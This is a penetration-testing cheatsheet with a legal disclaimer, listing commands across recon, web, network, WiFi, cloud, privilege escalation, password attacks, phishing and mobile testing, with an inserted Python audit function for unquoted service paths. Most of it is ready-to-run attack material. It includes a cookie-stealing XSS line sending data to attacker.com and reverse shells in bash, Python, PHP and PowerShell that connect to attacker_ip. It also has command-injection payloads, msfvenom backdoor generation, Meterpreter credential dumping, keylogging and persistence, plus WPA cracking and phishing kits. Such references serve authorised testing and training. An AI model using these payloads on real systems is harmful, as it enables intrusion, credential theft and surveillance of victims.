COMPLETE PENETRATION TESTING CHEATSHEET
⚠️ LEGAL DISCLAIMER: The information provided in this cheatsheet is for educational purposes only.
Only perform penetration testing on systems you own or have explicit written permission to test. Unauthorized
access to computer systems is illegal and punishable by law.
🔍 1. Reconnaissance & Information Gathering
Passive Reconnaissance
Gather information without directly interacting with the target
# WHOIS Lookup
whois domain.com
# DNS Enumeration
dig domain.com ANY
host -t ns domain.com
nslookup domain.com
# Search engine reconnaissance
# Google Dorks:
site:domain.com filetype:pdf
site:domain.com inurl:admin
site:domain.com intitle:"index of"
# Subdomain enumeration
sublist3r -d domain.com
amass enum -d domain.com
subfinder -d domain.com
# Shodan (Internet-connected devices)
shodan search "org:Company Name"
# theHarvester (email, subdomains, hosts)
theHarvester -d domain.com -b google
# Certificate Transparency Logs
# Visit: crt.sh
curl "https://crt.sh/?q=%25.domain.com&output=json"
Active Reconnaissance
# DNS Zone Transfer
dig axfr @ns1.domain.com domain.com
# DNS Brute Force
dnsrecon -d domain.com -t brt -D /usr/share/wordlists/dns.txt
# Find Email Addresses
# Visit: hunter.io
# Visit: phonebook.cz
# OSINT Framework
# Visit: osintframework.com
🎯 2. Scanning & Enumeration
Nmap - Port Scanning
# Basic scan
nmap -sV -sC target.com
# Full TCP scan
nmap -p- -sV -sC -A target.com
# UDP scan
nmap -sU -p 53,67,68,161 target.com
# Stealth SYN scan
nmap -sS target.com
# OS Detection
nmap -O target.com
# Aggressive scan
nmap -A -T4 target.com
# Scan specific ports
nmap -p 80,443,8080 target.com
# Scan entire subnet
nmap -sn 192.168.1.0/24
# Output to all formats
nmap -oA scan_results target.com
# Nmap scripts
nmap --script vuln target.com
nmap --script http-enum target.com
nmap --script smb-enum-shares target.com
Service Enumeration
# SMB Enumeration
enum4linux -a target.com
smbclient -L //target.com
smbmap -H target.com
# NFS Enumeration
showmount -e target.com
# SNMP Enumeration
snmpwalk -c public -v1 target.com
onesixtyone -c community.txt target.com
# LDAP Enumeration
ldapsearch -x -h target.com -s base
# FTP Enumeration
nmap --script ftp-anon target.com -p 21
🌐 3. Web Application Testing
Directory & File Discovery
# Gobuster
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
# Dirbuster / Dirb
dirb http://target.com
# Ffuf
ffuf -w /path/to/wordlist -u http://target.com/FUZZ
# Nikto
nikto -h http://target.com
SQL Injection
# Manual Testing
# Try: ' OR '1'='1
# Try: admin' --
# Try: ' UNION SELECT NULL--
# SQLMap
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database --tables
sqlmap -u "http://target.com/page.php?id=1" -D database -T users --dump
sqlmap -u "http://target.com/page.php?id=1" --batch --level=5 --risk=3
# POST request
sqlmap -u "http://target.com/login" --data="user=admin&pass=admin"
# With authentication
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abcd1234"
Cross-Site Scripting (XSS)
# Basic XSS Payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Cookie Stealing
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>
# XSStrike
xsstrike -u "http://target.com/search?q=test"
# javascript: URL payload (for href/URL sinks, often used when testing DOM-based XSS)
javascript:alert(document.domain)
Command Injection
# Test with these payloads:
; ls
| whoami
& cat /etc/passwd
`id`
$(uname -a)
# Time-based detection
; sleep 10
| ping -c 10 127.0.0.1
Local/Remote File Inclusion
# LFI (Local File Inclusion)
http://target.com/page.php?file=../../../../etc/passwd
http://target.com/page.php?file=....//....//....//etc/passwd
http://target.com/page.php?file=/etc/passwd%00
# LFI to RCE
http://target.com/page.php?file=/var/log/apache2/access.log
# (After poisoning log file with PHP code)
# RFI (Remote File Inclusion)
http://target.com/page.php?file=http://attacker.com/shell.txt
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
Burp Suite
# Proxy: 127.0.0.1:8080
# Key Features:
- Intercept and modify requests
- Spider/Crawler
- Intruder (automated attacks)
- Repeater (modify & resend requests)
- Scanner (Pro version)
- Decoder/Comparer
# Configure browser proxy:
Firefox: Settings > Network > Manual Proxy
HTTP Proxy: 127.0.0.1, Port: 8080
🌐 4. Network Penetration Testing
ARP Spoofing / MITM
# Ettercap
ettercap -T -M arp:remote /target_ip/ /gateway_ip/
# ARPSpoof
arpspoof -i eth0 -t target_ip gateway_ip
# Bettercap
bettercap -iface eth0
> set arp.spoof.targets target_ip
> arp.spoof on
> net.sniff on
Network Sniffing
# Wireshark Filters
http.request.method == "POST"
tcp.port == 80
ip.addr == 192.168.1.100
# TCPDump
tcpdump -i eth0 port 80
tcpdump -i eth0 -w capture.pcap
tcpdump -r capture.pcap
# Tshark
tshark -i eth0 -Y http.request
DNS Spoofing
# Using Ettercap
# Edit: /etc/ettercap/etter.dns
# Add: target.com A attacker_ip
ettercap -T -M arp:remote -P dns_spoof /target_ip/ /gateway_ip/
📡 5. Wireless (WiFi) Penetration Testing
WiFi Reconnaissance
# Enable monitor mode
airmon-ng start wlan0
# Scan for networks
airodump-ng wlan0mon
# Target specific network
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon
WPA/WPA2 Cracking
# Capture handshake
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon
# Deauth clients to capture handshake
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack with Aircrack-ng
aircrack-ng -w /path/to/wordlist.txt capture-01.cap
# Crack with Hashcat
hashcat -m 2500 capture.hccapx /path/to/wordlist.txt
# Convert cap to hccapx
cap2hccapx capture-01.cap output.hccapx
WPS Attack
# Reaver (WPS PIN attack)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Wash (detect WPS)
wash -i wlan0mon
# Bully
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
Evil Twin Attack
# Create fake AP
airbase-ng -e "FakeWiFi" -c 6 wlan0mon
# Wifiphisher
wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgrade
# Fluxion
fluxion
☁️ 6. Cloud Penetration Testing
AWS Enumeration
# AWS CLI Configuration
aws configure
# List S3 Buckets
aws s3 ls
aws s3 ls s3://bucket-name
# Check bucket permissions
aws s3api get-bucket-acl --bucket bucket-name
# Download from public bucket
aws s3 sync s3://bucket-name . --no-sign-request
# EC2 Enumeration
aws ec2 describe-instances
aws ec2 describe-security-groups
# IAM Enumeration
aws iam list-users
aws iam list-roles
aws iam get-user
# S3 Scanner
s3scanner scan --buckets-file buckets.txt
Azure Enumeration
# Azure CLI
az login
az account list
# List VMs
az vm list
# List storage accounts
az storage account list
# MicroBurst (PowerShell)
Import-Module MicroBurst.psm1
Get-AzureDomainInfo -Verbose
Google Cloud Platform (GCP)
# GCloud CLI
gcloud auth login
gcloud projects list
# List instances
gcloud compute instances list
# List storage buckets
gsutil ls
# GCPBucketBrute
python3 gcpbucketbrute.py -k keywords.txt
Docker/Kubernetes
# Docker
docker ps
docker images
docker exec -it container_id /bin/bash
# Kubernetes
kubectl get pods
kubectl get secrets
kubectl exec -it pod_name -- /bin/bash
# kube-hunter
kube-hunter --remote ip_address
💥 7. Exploitation & Post-Exploitation
Metasploit Framework
# Start Metasploit
msfconsole
# Search for exploits
search type:exploit platform:windows smb
# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
# Set options
set RHOSTS target_ip
set LHOST attacker_ip
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Run exploit
exploit
# Common Payloads
windows/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
php/meterpreter/reverse_tcp
# Multi Handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit -j
Reverse Shells
# Netcat Listener
nc -lvnp 4444
# Bash Reverse Shell
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP Reverse Shell
php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# PowerShell Reverse Shell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("attacker_ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Upgrading Shells
# Python PTY
python -c 'import pty; pty.spawn("/bin/bash")'
# Fully Interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg
export TERM=xterm
# Socat
# On attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# On victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:attacker_ip:4444
Meterpreter Commands
# System Info
sysinfo
getuid
ps
# Navigation
pwd
cd C:\\
ls
# File Operations
download C:\\file.txt
upload /path/to/file C:\\
# Privilege Escalation
getsystem
# Dump Passwords
hashdump
load kiwi
creds_all
# Persistence
run persistence -X -i 10 -p 4444 -r attacker_ip
# Screenshot
screenshot
# Keylogger
keyscan_start
keyscan_dump
# Port Forwarding
portfwd add -l 3389 -p 3389 -r target_ip
⬆️ 8. Privilege Escalation
Linux Privilege Escalation
# Enumeration Scripts
# LinPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
./LinEnum.sh
# Manual Checks
# SUID Files
find / -perm -4000 -type f 2>/dev/null
# Writable /etc/passwd
ls -la /etc/passwd
# Sudo Rights
sudo -l
# Cron Jobs
cat /etc/crontab
crontab -l
ls -la /etc/cron*
# Capabilities
getcap -r / 2>/dev/null
# Kernel Exploits
uname -a
searchsploit linux kernel 4.4.0
# PATH Injection
echo $PATH
# NFS Shares
cat /etc/exports
showmount -e target_ip
# Docker Escape
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Windows Privilege Escalation
# Enumeration Scripts
# WinPEAS
winpeas.exe
# PowerUp
powershell -ep bypass
Import-Module PowerUp.ps1
Invoke-AllChecks
# Manual Checks
# System Info
systeminfo
whoami /all
# Unquoted Service Paths
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
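Added example, not part of the cheatsheet: the wmic | findstr pipeline above, reproduced as a Python audit function a defender can run over an exported service inventory to find auto-start services whose unquoted path needs quoting or an ACL review. The service rows and names are constructed sample data.

```python
import re
from typing import Iterable

# Constructed sample rows in the column order of
# `wmic service get name,pathname,startmode` (not taken from a real host).
SAMPLE_SERVICES = [
    ("GoodSvc",   '"C:\\Program Files\\Vendor\\svc.exe" -run', "Auto"),
    ("BadSvc",    "C:\\Program Files\\Vendor Tools\\svc.exe --daemon", "Auto"),
    ("WinSvc",    "C:\\Windows\\System32\\svchost.exe -k netsvcs", "Auto"),
    ("ManualSvc", "C:\\Program Files\\Other App\\run.exe", "Manual"),
    ("NoSpace",   "C:\\Tools\\svc.exe", "Auto"),
]

# Executable part of the path: everything up to the first ".exe" that is
# followed by whitespace or end of string (arguments come after it).
_EXE = re.compile(r"^(.*?\.exe)(\s|$)", re.IGNORECASE)


def is_unquoted_path_risk(pathname: str, startmode: str) -> bool:
    """Mirror of the findstr filters: keep auto-start services, drop paths that
    are quoted or live under C:\\Windows\\, then flag the remaining ones whose
    executable path contains a space (the condition the filter is hunting)."""
    if startmode.strip().lower() != "auto":
        return False
    path = pathname.strip()
    if path.startswith('"'):
        return False
    if path.lower().startswith("c:\\windows\\"):
        return False
    m = _EXE.match(path)
    exe_path = m.group(1) if m else path
    return " " in exe_path


def audit_services(rows: Iterable[tuple]) -> list:
    """Return the names of services whose binary path should be quoted."""
    return [name for name, pathname, startmode in rows
            if is_unquoted_path_risk(pathname, startmode)]


if __name__ == "__main__":
    for name in audit_services(SAMPLE_SERVICES):
        print("unquoted auto-start service path:", name)
```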
# Weak Service Permissions
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
# AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# Scheduled Tasks
schtasks /query /fo LIST /v
# Stored Credentials
cmdkey /list
runas /savecred /user:admin cmd.exe
# Registry Autoruns
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# Kernel Exploits
# Check with: systeminfo
# Use: Windows-Exploit-Suggester
GTFOBins / LOLBAS
# GTFOBins (Linux)
# Visit: gtfobins.github.io
# Example: vim, find, less, etc.
# LOLBAS (Windows)
# Visit: lolbas-project.github.io
# Example: certutil, bitsadmin, etc.
🔐 9. Password Attacks
Hash Cracking
# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --format=NT hashes.txt
john --show hashes.txt
# Hashcat
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
# -m 0 = MD5
# -m 100 = SHA1
# -m 1000 = NTLM
# -m 1800 = sha512crypt
# Generate wordlist with rules
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule wordlist.txt > mutated.txt
# Identify Hash Type
hashid hash.txt
hash-identifier
Brute Force Attacks
# Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip
hydra -L users.txt -P passwords.txt target_ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
hydra -l admin -P passwords.txt ftp://target_ip
hydra -l admin -P passwords.txt rdp://target_ip
# Medusa
medusa -h target_ip -u admin -P passwords.txt -M ssh
# Ncrack
ncrack -p 22 --user admin -P passwords.txt target_ip
# Patator
patator ssh_login host=target_ip user=admin password=FILE0 0=passwords.txt
Wordlist Generation
# Crunch
crunch 8 8 -t ,@@^^%%% -o wordlist.txt
# , = uppercase
# @ = lowercase
# % = numbers
# ^ = symbols
# Cewl (from website)
cewl -d 2 -m 5 http://target.com -w wordlist.txt
# Username generator (from names)
# https://github.com/urbanadventurer/username-anarchy
./username-anarchy John Smith > users.txt
Password Spraying
# CrackMapExec
crackmapexec smb target_ip -u users.txt -p 'Password123'
# Spray (for O365)
python spray.py -U users.txt -P 'Password123' -d domain.com
🎭 10. Social Engineering
Phishing
# SET (Social Engineering Toolkit)
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method
# Gophish
# Web-based phishing framework
./gophish
# Access: https://localhost:3333
# King Phisher
# Advanced phishing campaign toolkit
Payload Generation
# Msfvenom
# Windows EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf > shell.elf
# PHP Backdoor
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw > shell.php
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 R > app.apk
# Windows Macro
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f vba
# Encoded Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe
📱 11. Mobile Application Testing
Android
# ADB (Android Debug Bridge)
adb devices
adb shell
adb pull /data/data/com.app/databases/app.db
# Decompile APK
apktool d app.apk
# Convert APK to JAR
d2j-dex2jar app.apk
# View JAR with JD-GUI
jd-gui app-dex2jar.jar
# MobSF (Mobile Security Framework)
# Upload APK for analysis
# Frida (Dynamic instrumentation)
frida-ps -U
frida -U -f com.app.name -l script.js
iOS
# Requires Jailbroken device
# SSH to device
ssh root@device_ip
# Default password: alpine
# Cycript
cycript -p AppName
# Class-dump-z
class-dump-z App.app -H -o headers/
# Frida
frida-ps -U
frida -U AppName -l script.js
💡 Best Practices
- Always get written authorization before testing
- Document everything thoroughly
- Use VPN/anonymization when appropriate
- Keep your tools updated
- Practice in legal environments (HTB, THM, etc.)
- Understand the tools, don't just run them blindly
- Follow responsible disclosure for vulnerabilities